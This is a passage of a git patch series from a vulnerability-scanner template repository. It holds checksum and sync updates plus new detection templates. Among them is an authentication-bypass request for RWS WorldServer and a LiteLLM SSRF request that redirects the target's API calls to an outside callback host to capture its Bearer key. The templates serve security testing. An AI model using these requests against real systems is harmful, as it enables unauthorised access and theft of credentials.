-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:2fb3b374247ac69a55cc576fe6fbb295173992cd +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:1a010e2ad1675865003a59ff090f4eca934a0589 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:56695949b19866f10891acaf7a47c027417d02c7 http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:8d7ade389cbd68d3f0636c7cdba978b2c389d59e +http/technologies/wordpress/plugins/tablepress.yaml:6905ca84704f284e628b6ad434be2615820fbb1c +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:e03bf7985e670d04e17e52959f7561a91fe78e92 +http/technologies/wordpress/plugins/templately.yaml:060101ba38ced96d17ec892a0ca92dc5f2e25609 +http/technologies/wordpress/plugins/the-events-calendar.yaml:9ac8c27e4011d3a22c9d55d93490cc41a9ea42d5 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:3fdf2413cfd6f8fcc8cbf9941ca561f24b53c5d5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:3b9ab0bbe86e8c1a1e7bb8cc2bb73aa01810c409 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:b4bccdcf0cad0e9022ff0f9e5016f95a321090c7 +http/technologies/wordpress/plugins/under-construction-page.yaml:7bd2761585ca4cea52fc3ca5e098f71105c736a0 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:42e7e9e85cb7774cc23e5c5e541dcce93350a2de http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:098ff0a32979b9ee82c9381d78117921c443e28a http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6da45134085dfb490f9c328e640ff32f2c6fe90 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:e6807c6d99d3097eadfd9ea8548cfa510e5cdd96 +http/technologies/wordpress/plugins/webp-express.yaml:3dbc47eb75eb4852968361545351f16ec2153c4e +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:fb1eeb9595710518782bc04add734f26e390c920 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:76c14c6f07bea4c5fe970c1ab31af3c61b17c8d5 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:98ad1790376c5a4105132736ff9cbbf024cf8168 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:9b29c552294a589bf21ca79532e8ac9987964463 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:bce5fe28e1a5670ca4c19697573d786c84cb395d +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:d2f012056023b1e761f5b74db2f8a8d9365cc904 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:c8aa149d717fa5ae1eabe8e04cb9d75470b5b053 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:6a9ac472a7676d124506a367d5d8b6404f9af1a1 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:c571b7a9b56c252eaf096bf92fbc4dfab6405f72 +http/technologies/wordpress/plugins/woocommerce-services.yaml:a96791bc39d5f816c426deaa65fdd4c46c8f103e +http/technologies/wordpress/plugins/woocommerce.yaml:c7e5a31b4863d0a8806e1df85f7b68f1717ac2ac +http/technologies/wordpress/plugins/wordfence.yaml:649ebf96a4c4b0995fd21ee9b7c7a18a2affa10a +http/technologies/wordpress/plugins/wordpress-importer.yaml:a91762f62870bc491e77abfb7abeb1198c7bc17e +http/technologies/wordpress/plugins/wordpress-seo.yaml:c70556f7881421b5d1d33222031ac9f4178ec5e0 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:0d9e2af5b81b6e40394e75f6359f4051ab097e9e +http/technologies/wordpress/plugins/wp-crontrol.yaml:b9591dc5862acbed331ee5a5965277c21df1a46a +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:526c044faeee667d2de8d1a10e0af155de8931a4 +http/technologies/wordpress/plugins/wp-file-manager.yaml:dd8d315fb2b60f90c59b1df3903cddffc3e5325e +http/technologies/wordpress/plugins/wp-google-maps.yaml:3c869ab8c6aa1fb39282c86fa64a416286539590 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:07bd3aee59126ff4e3c4f45d2bd135d1b9ad62b3 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:601956387e05a765faaaa697ab7a199d7388a4c1 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:320d78e9ba91987b8bd9c025a817a9b2d0eb4c92 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:5d8939d49b1426c535a444c9910af602c2ad48ae +http/technologies/wordpress/plugins/wp-optimize.yaml:6d9cdaf7e432de6269fdbc0663df4821f15d294d +http/technologies/wordpress/plugins/wp-pagenavi.yaml:ea0b192243ad2a0c25ad3b9c74e0a382618addd4 +http/technologies/wordpress/plugins/wp-reset.yaml:e7204ef31e15d1c66158ff337a8a5f8157c4a4ef +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:c2e38012681ef5c9c065c6fdc66e9ab904c64e1d +http/technologies/wordpress/plugins/wp-rollback.yaml:f32c7811a58482daef32a8c3a5ad01f650a23177 +http/technologies/wordpress/plugins/wp-seopress.yaml:f8bd0f0776152e423b7cb5bfc6a58468327fcb19 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:328ef029d506a82fb9951f8e99d521d16529484b +http/technologies/wordpress/plugins/wp-smushit.yaml:ece1d01b4c4f3455785253d055dec10815a2ead9 +http/technologies/wordpress/plugins/wp-statistics.yaml:e78540c3327ad69edbdb8478add1b88a699e052b +http/technologies/wordpress/plugins/wp-super-cache.yaml:e9fa3943fc4f85a754a0f47cb9c257b3c0928b5c http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:b58f11a40960b596602de7951df689f722c42176 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:329eb13efbefb26dd0ee8d4f2eeb8f51f97bec17 +http/technologies/wordpress/plugins/wpforms-lite.yaml:6c8510d73c5c8c086b22092c9363322044743277 +http/technologies/wordpress/plugins/wps-hide-login.yaml:0e7b4631f76a21a5efd4df544b76c9925e533d39 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:4edf19e0d2bc94a2cefb3092df7b18f241cbad9a http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:068044562f411a1d1e7b068a23fee7bde5174e18 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8804,7 +8805,7 @@ network/detection/weblogic-t3-detect.yaml:74b2d9812a56e856258d2be39f049c97d1d322 network/detection/wing-ftp-detect.yaml:348ee17259fa914b2616136b6a957d4fb065fad0 network/detection/ws_ftp-ssh-detect.yaml:ed6343cf51322aaa43abcd235f01064e11b76243 network/detection/xlight-ftp-service-detect.yaml:0f71e841dfea0daaa4c5c812b31561f88f010c60 -network/enumeration/beanstalk-service.yaml:30e5c70f87c967bfb79a145fc6854896c8d9c09e +network/enumeration/beanstalk-service.yaml:f7a42db4e1d82575f8a066ecf6afab009e9697df network/enumeration/kafka-topics-list.yaml:ed82c8cd5749c2e11d2e6bf3dd14d2270371b9c0 network/enumeration/mongodb-info-enum.yaml:d30bc0bc233e5e5f8c50a6c5b7f5eeb9415eb859 network/enumeration/niagara-fox-info-enum.yaml:971dad0b0bd60622a27c34ece193af950e7de0ca @@ -8904,7 +8905,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fccf94e56dbbbcdda25c6a0ed41852e629c0f59f +templates-checksum.txt:49ac127cfc83bc28812f9a66381f7dbdf362802a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ad068fcacde3a6778d2dbc6b8dce4d07caf415d2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 22 Jul 2024 07:42:56 +0000 Subject: [PATCH 1494/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index df372f3da2..fbe9ce02f4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,6 +28,7 @@ on: - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/freshrss-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' + - 'http/exposed-panels/netflow-analyzer-panel.yaml' - 'http/exposed-panels/tomcat/tomcat-exposed.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' From aa9c15803635cae62d2a0e306da08336865ae83d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 07:43:59 +0000 Subject: [PATCH 1495/1841] Auto Template Signing [Mon Jul 22 07:43:59 UTC 2024] :robot: --- http/exposed-panels/netflow-analyzer-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/netflow-analyzer-panel.yaml b/http/exposed-panels/netflow-analyzer-panel.yaml index 23e6e0f4a1..eb931f3cfe 100644 --- a/http/exposed-panels/netflow-analyzer-panel.yaml +++ b/http/exposed-panels/netflow-analyzer-panel.yaml @@ -26,3 +26,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 93b606e4cd8146ef3db20df930ecd170f7222f15 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 22 Jul 2024 07:46:02 +0000 Subject: [PATCH 1496/1841] Auto Generated New Template Addition List [Mon Jul 22 07:46:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 49073cac2d..fc8e95a638 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/freshrss-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml +http/exposed-panels/hal-management-panel.yaml http/exposed-panels/netflow-analyzer-panel.yaml http/exposed-panels/tomcat/tomcat-exposed.yaml http/exposures/configs/apache-ozone-conf.yaml From 62d071e2ca5a8e0e18f8c8dd1f09d0e3aee97215 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 07:46:08 +0000 Subject: [PATCH 1497/1841] Auto Generated Templates Checksum [Mon Jul 22 07:46:08 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b013ad3a03..db5a62cd88 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -244,7 +244,7 @@ dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 -dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26 +dast/vulnerabilities/ssrf/blind-ssrf.yaml:062383a1480c443846d018fac5ec5d97773e8f75 dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 @@ -4342,7 +4342,7 @@ http/exposed-panels/nessus-panel.yaml:87b3063a5e06c727b4c173666ebbd0c60298054f http/exposed-panels/netdata-dashboard-detected.yaml:88a57f2a4a6d8cbc86e33430540b3dd56cf9a011 http/exposed-panels/netdata-panel.yaml:8fd3ca0fb8484c1e551786fb041a5281c28c81a3 http/exposed-panels/netflix-conductor-ui.yaml:4ecd3cb1f70552519e9cbbc96a78e64e91d16389 -http/exposed-panels/netflow-analyzer-panel.yaml:e8022e7842324d1bfe677ac71af755cb69ee4251 +http/exposed-panels/netflow-analyzer-panel.yaml:6068ac44f610702c87af100d1c0bc4ce3f100a82 http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d313389c3c http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27 http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a @@ -8905,7 +8905,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:49ac127cfc83bc28812f9a66381f7dbdf362802a +templates-checksum.txt:504de109984ad49ec465238524f7da1cd17c69d7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4e465e7b536011d545ff7f563eb9741f13e1c26e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 22 Jul 2024 07:46:59 +0000 Subject: [PATCH 1499/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index fbe9ce02f4..00d1cb4f08 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,6 +28,7 @@ on: - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/freshrss-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' + - 'http/exposed-panels/hal-management-panel.yaml' - 'http/exposed-panels/netflow-analyzer-panel.yaml' - 'http/exposed-panels/tomcat/tomcat-exposed.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' From 162f171bb030f757281569d229f234fbe98059f3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 07:47:49 +0000 Subject: [PATCH 1500/1841] Auto Template Signing [Mon Jul 22 07:47:49 UTC 2024] :robot: --- dast/vulnerabilities/ssrf/blind-ssrf.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml index da3b1c31ab..fa6045395a 100644 --- a/dast/vulnerabilities/ssrf/blind-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022043639a2b3d837698f0ad1d5c78b81a92dc67cfe8ea18afeb57f006cf44e2803902204a61e6eeb0c529913899c9f8aae306dbddcac78f5f41837679b8ba15ada3b5db:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207dd98fdf4b66bd8e09960f133e03a0e539cbd3a4749f1de33bc45ca104a07d90022100e35cf6744d140265a35163217357e7983b162f6cbbe6f96ffb73df5eb24bc570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 873b388a7abe3d0459623032715449c330758f55 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 22 Jul 2024 13:44:01 +0530 Subject: [PATCH 1501/1841] Create CVE-2022-34267.yaml --- http/cves/2022/CVE-2022-34267.yaml | 49 ++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/cves/2022/CVE-2022-34267.yaml diff --git a/http/cves/2022/CVE-2022-34267.yaml b/http/cves/2022/CVE-2022-34267.yaml new file mode 100644 index 0000000000..fb02f69f88 --- /dev/null +++ b/http/cves/2022/CVE-2022-34267.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-34267 + +info: + name: RWS WorldServer - Authentication Bypass + author: pdresearch,iamnoooob,rootxharsh,parthmalhotra + severity: critical + description: | + An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint. + reference: + - https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver + - https://www.rws.com/localization/products/trados-enterprise/worldserver/ + - https://github.com/tanjiti/sec_profile + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-34267 + cwe-id: CWE-287 + epss-score: 0.00106 + epss-percentile: 0.43655 + cpe: cpe:2.3:a:rws:worldserver:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: rws + product: worldserver + shodan-query: title:"WorldServer" + tags: cve,cve2022,worldserver,auth-bypass + +http: + - raw: + - | + GET /ws-api/v2/users/me/details?token=02 HTTP/2 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"fullName":"System"' + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200 From e54eb32b1ab6159bb0ef2f194fba0901aa344885 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 22 Jul 2024 14:17:21 +0530 Subject: [PATCH 1502/1841] Create CVE-2024-6587.yaml --- http/cves/2024/CVE-2024-6587.yaml | 43 +++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6587.yaml diff --git a/http/cves/2024/CVE-2024-6587.yaml b/http/cves/2024/CVE-2024-6587.yaml new file mode 100644 index 0000000000..6732aa8492 --- /dev/null +++ b/http/cves/2024/CVE-2024-6587.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-6587 + +info: + name: LiteLLM Blind - SSRF Exposes OpenAI API Keys + author: pdresearch,iamnoooob,rootxharsh,lambdasawa + severity: high + reference: + - https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:439373620 + tags: cve,cve2024,ssrf,openai,litellm + +http: + - raw: + - | + POST /chat/completions HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "model": "command-nightly", + "messages": [ + { + "content": "Hello, how are you?", + "role": "user" + } + ], + "api_base": "https://{{interactsh-url}}" + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "Bearer" From fbfb6abbed6b90228832fde03675a9cdcbe5579b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 22 Jul 2024 14:54:48 +0530 Subject: [PATCH 1503/1841] Update CVE-2023-2309.yaml --- http/cves/2023/CVE-2023-2309.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-2309.yaml b/http/cves/2023/CVE-2023-2309.yaml index 81ecac34b4..6238fafb89 100644 --- a/http/cves/2023/CVE-2023-2309.yaml +++ b/http/cves/2023/CVE-2023-2309.yaml @@ -11,19 +11,22 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-2309 - https://wpscan.com/vulnerability/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d/ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-218-reflected-cross-site-scripting-via-wpforo-debug + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2309 epss-score: 0.00052 - epss-percentile: 0.20645 + epss-percentile: 0.20793 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: + verified: true max-request: 1 vendor: gvectors product: wpforo_forum framework: wordpress - tags: xss,wpscan,cve,cve2023,wp-plugin + publicwww-query: "/wp-content/plugins/wpforo/" + tags: cve,cve2023,wordpress,wpforo,wpscan,wp-plugin,wp,xss http: - raw: @@ -34,6 +37,7 @@ http: matchers: - type: dsl dsl: - - 'contains(body,"") && contains(header,"text/html")' + - 'contains_all(body,"","wpforo")' + - 'contains(header,"text/html")' - 'status_code == 200' condition: and From cd4a8c3479bb7eb9352268cfe022b82c2310276d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 22 Jul 2024 15:02:24 +0530 Subject: [PATCH 1504/1841] Update and rename bazarr-arbitrary-file-read.yaml to CVE-2024-40348.yaml --- .../2024/CVE-2024-40348.yaml} | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) rename http/{vulnerabilities/other/bazarr-arbitrary-file-read.yaml => cves/2024/CVE-2024-40348.yaml} (88%) diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/cves/2024/CVE-2024-40348.yaml similarity index 88% rename from http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml rename to http/cves/2024/CVE-2024-40348.yaml index c4953b556d..d89e06ac17 100644 --- a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -1,4 +1,4 @@ -id: bazarr-arbitrary-file-read +id: CVE-2024-40348 info: name: Bazarr < 1.4.3 - Arbitrary File Read @@ -9,6 +9,10 @@ info: reference: - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md - https://www.bazarr.media/ + - 